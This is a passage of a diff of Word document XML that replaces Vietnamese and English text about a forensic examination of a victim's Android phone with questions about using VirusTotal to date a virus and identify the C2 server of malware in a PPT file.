-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>primarily</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>used</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>on</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>his</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>phone</w:t>
+        <w:t>creation</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1457,7 +1017,7 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="34"/>
+          <w:numId w:val="40"/>
         </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1471,85 +1031,75 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve">ALEAPP có khả năng phân tích các hiện tượng của </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Android</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> như dữ liệu ứng dụng, hoạt động người dùng và nhật ký hệ thống. Công cụ này đặc biệt hữu ích trong việc tái tạo trạng thái của thiết bị và hiểu hành vi của người dùng. Bằng cách hướng ALEAPP đến hệ thống tệp đã giải nén trên điện thoại nạn nhân</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Dùng </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Virustotal</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> để xác định thời gian </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>virus</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> này được tạo ra, tại phần </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>details</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> củ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>web</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="34"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Trong danh sách các ứng dụng được cài đặt trên điện thoại của nạn nhân, tôi đã xác định được một ứng dụng đặc biệt đáng chú </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ý, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">một ứng dụng giao dịch với gói ID </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>com.ticno.olymptrade</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
@@ -1563,10 +1113,10 @@
           <w:szCs w:val="26"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BD2D3CF" wp14:editId="43B5AAFC">
-            <wp:extent cx="5943600" cy="2841625"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1775541982" name="Picture 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5504EB04" wp14:editId="0940919F">
+            <wp:extent cx="5943600" cy="2793365"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
+            <wp:docPr id="721096579" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1574,7 +1124,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1775541982" name=""/>
+                    <pic:cNvPr id="721096579" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -1586,7 +1136,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="2841625"/>
+                      <a:ext cx="5943600" cy="2793365"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1615,7 +1165,6 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Top of Form</w:t>
       </w:r>
     </w:p>
@@ -1670,7 +1219,205 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>According</w:t>
+        <w:t>Identifying</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>command</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>control</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (C2) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>server</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>that</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>communicates</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>with</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> can </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>help</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>trace</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>back</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1688,7 +1435,43 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>testimony</w:t>
+        <w:t>attacker</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Which</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> C2 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>server</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1706,7 +1489,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>of</w:t>
+        <w:t>does</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1724,7 +1507,25 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>victim's</w:t>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in the PPT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>file</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1742,7 +1543,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>best</w:t>
+        <w:t>communicate</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1760,511 +1561,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>friend</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, he </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>said</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>, "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>While</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>we</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>were</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>together</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>my</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>friend</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>got</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>several</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>calls</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> he </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>avoided</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. He </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>said</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> he </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>owed</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
